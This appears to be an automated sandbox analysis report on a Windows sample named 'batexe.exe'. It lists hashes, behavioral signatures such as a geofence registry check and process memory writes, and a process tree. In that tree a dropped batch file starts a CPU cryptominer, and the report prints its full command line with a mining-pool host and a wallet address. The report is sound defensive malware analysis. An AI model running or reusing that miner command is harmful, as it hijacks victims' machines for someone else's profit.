Analysis
-
max time kernel
298s -
max time network
297s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-ja -
resource tags
arch:x64arch:x86image:win10v2004-20231215-jalocale:ja-jpos:windows10-2004-x64systemwindows -
submitted
13-02-2024 05:44
Behavioral task
behavioral1
Sample
batexe.exe
Resource
win10-20231220-ja
Behavioral task
behavioral2
Sample
batexe.exe
Resource
win10v2004-20231215-ja
General
-
Target
batexe.exe
-
Size
9.4MB
-
MD5
cdc9eacffc6d2bf43153815043064427
-
SHA1
d05101f265f6ea87e18793ab0071f5c99edf363f
-
SHA256
73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
-
SHA512
fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
-
SSDEEP
196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1815711207-1844170477-3539718864-1000\Control Panel\International\Geo\Nation batexe.exe Key value queried \REGISTRY\USER\S-1-5-21-1815711207-1844170477-3539718864-1000\Control Panel\International\Geo\Nation b2e.exe -
Executes dropped EXE 2 IoCs
pid Process 1732 b2e.exe 4816 cpuminer-sse2.exe -
Loads dropped DLL 6 IoCs
pid Process 4816 cpuminer-sse2.exe 4816 cpuminer-sse2.exe 4816 cpuminer-sse2.exe 4816 cpuminer-sse2.exe 4816 cpuminer-sse2.exe 4816 cpuminer-sse2.exe -
resource yara_rule behavioral2/memory/4812-9-0x0000000000400000-0x000000000393A000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 4812 wrote to memory of 1732 4812 batexe.exe 83 PID 4812 wrote to memory of 1732 4812 batexe.exe 83 PID 4812 wrote to memory of 1732 4812 batexe.exe 83 PID 1732 wrote to memory of 436 1732 b2e.exe 84 PID 1732 wrote to memory of 436 1732 b2e.exe 84 PID 1732 wrote to memory of 436 1732 b2e.exe 84 PID 436 wrote to memory of 4816 436 cmd.exe 87 PID 436 wrote to memory of 4816 436 cmd.exe 87
Processes
-
C:\Users\Admin\AppData\Local\Temp\batexe.exe"C:\Users\Admin\AppData\Local\Temp\batexe.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4812 -
C:\Users\Admin\AppData\Local\Temp\8CA0.tmp\b2e.exe"C:\Users\Admin\AppData\Local\Temp\8CA0.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\8CA0.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1732 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\92E9.tmp\batchfile.bat" "3⤵
- Suspicious use of WriteProcessMemory
PID:436 -
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.execpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 34⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4816
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
128KB
MD5272c54a9b6cdfa558e23cc257343048a
SHA17f26d86cf2a3625ce3e70c9cfc9b0cc075b8d5aa
SHA2561d7e7ea2934d091cb7ab81c31e31b4015e05a9f86b213f9d78b0297c88fb3415
SHA5125139de29262ba7091e5ab0529232912aea9ca34fdeb16165021d3ccaba1d351abc59f2130eaa6af8c3c0510db5f649095f7043ea837267dc9eb4ce0169fa18ba
-
Filesize
3.4MB
MD5ddd936d7886403784096ea1afe95346a
SHA1a3012560c687d10b4adfb3874c22d1b0c30d838a
SHA256a0c83c21c36c6fe424c54db133a047aa2d72ad25e5a3a4784955c60da76d02df
SHA5125cdba6259f78d97cfba2090d32960cd6acc30b0957b10efd34edd3528f20c3c4b0f303646d0c0bb8c8f8060fe19703a199c339ae12e7461568e6525e4ec6b676
-
Filesize
3.0MB
MD5b6472b96a630d8fd76249fc56e81a709
SHA1add501c77fbd74b1fcc99eaa9a3e036c39778e6d
SHA256a1bdf09684248907d3c8075552099ac22e09ba82b7ad73f9cb6fa92fecd06818
SHA5127c571613353cbc843bf62e114c4162fff6a14f36895b22fc2f72cce0cb66892fd6a9e4eee89a6c485891474fb3c547f2501eb78c1f4f9a32f06819223262a21a
-
Filesize
136B
MD58ea7ac72a10251ecfb42ef4a88bd330a
SHA1c30f6af73a42c0cc89bd20fe95f9159d6f0756c5
SHA25665e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9
SHA512a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0
-
Filesize
1.1MB
MD5974d8e7e74946132617ad01f9b067b8b
SHA1ae26d5778b794b07efd9aad3eaa8cd2c683b4d20
SHA256b47c60485e29e4f1dc09edd4df505219a8ab8a3e36fda02cf0adcf9f79d5d82f
SHA512464a3149b264eeddfd15bd4ad7b167b42e0166c6e3b03096ad49a42eeeed3c446c506e64475804508f9bbe4e99955a437fb31393fa0f91ae164126d9fdc599b2
-
Filesize
1.4MB
MD5cc86481266998266992589d495c99896
SHA1e805ede5477c20cf5d22b48192f5d5c8b65b92ff
SHA256821cad4073a6aaf1e3b6ae3360c9733c6e8e6b2a8cadcd5fb7f04ef17cafca42
SHA512a3b4dace858810e41a3effdfc24d5df695b3e6cf58de964423f28fc9ae0a98bb7a868f3243a7838ec820654146542f2653225ec5ba480b1d95d32bade5eb09d4
-
Filesize
836KB
MD5aeab40ed9a8e627ea7cefc1f5cf9bf7a
SHA15e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8
SHA256218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9
SHA512c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8
-
Filesize
780KB
MD5f8a5a1ff1f1940d9e3dff5a8a68ee423
SHA175301262e6231b1f35a734b5a7fa9790d6719ca4
SHA2560a5cdb9bd5ffb37af5e3100a7178bdb70d83b12939779c10a87846d3beeba0ed
SHA5129912c85c1dc7302855ea43b0712880c4181f12981f8c576fe253db83b92f46231ed4e7b4bac4b9af2cbac304cf887ba124a8e5c62fc023be568384b153a2bf2c
-
Filesize
1.1MB
MD5701566f375355cfcfbc914799780622a
SHA1540dbf8dddfaa321532a1f01f354fd8af1a2cc2a
SHA2567ea7185be527355176ceb66f86b0fb596a5a42c5317d16f11f1291d0ba29736f
SHA51234084a404ebf3c18d66efe4bece341bcf16c5fdcd8a0ee5b470be3e89ecb517410b7098691d1cc347d1f1c378f4c8d51b745555596cb4882af03c2863b7f9002
-
Filesize
1.2MB
MD52bbcb75e834089e470268a34185c930d
SHA1356f833f405878fc4fd94bf8d9e042bc1b4ad376
SHA256438f5a89485f63a9bca37358529921223ca4a2291a76ce294e783095f29858f5
SHA512a1c95d4b9840a53999284c75eb145301bc8905dc9bcca526e3bcf89fa554fedee8e8ed4a3ced2717401039e5fd0f866bd482c679ae7b8f00feb7ca00263bc9cc
-
Filesize
1.1MB
MD5ef9502008fbd335d836397c3f1098662
SHA18a86698f0b592c61c30d953b9cd1a523ecae01c1
SHA2567ed2ae85755e31379aec34024ae73c69d0a4c5882dcc047222f79eff3b2926b2
SHA51233cacb438827402fcd0757175e9d970bbba6ffb9167ff260e9aad251cc8db677def6f033439d211164e3d4ed5202b06f7cf17781f9b966a807a548bf5999487c
-
Filesize
1.2MB
MD5c70d9ca670a4713543dc6cd764a87673
SHA1bcc3f61e6e35c8a49eb6dee93a129c6c823adb2a
SHA256203351e935138a86c7ec5f9193f5b3307fc031755783b2037454d70ad5e1b03a
SHA512598c43313e3b4b721f2f1dc7b93818f20101cc215ffba6c6995a933433a7f8ed1dd4b16f2aa4307cbd261440c34e8894bfe93f8c6aa44f91081f3e72a11a47f4
-
Filesize
606KB
MD5585efec1bc1d4d916a4402c9875dff75
SHA1d209613666ccac9d0ddab29a3bc59aa00a0968fa
SHA2562f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232
SHA512b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770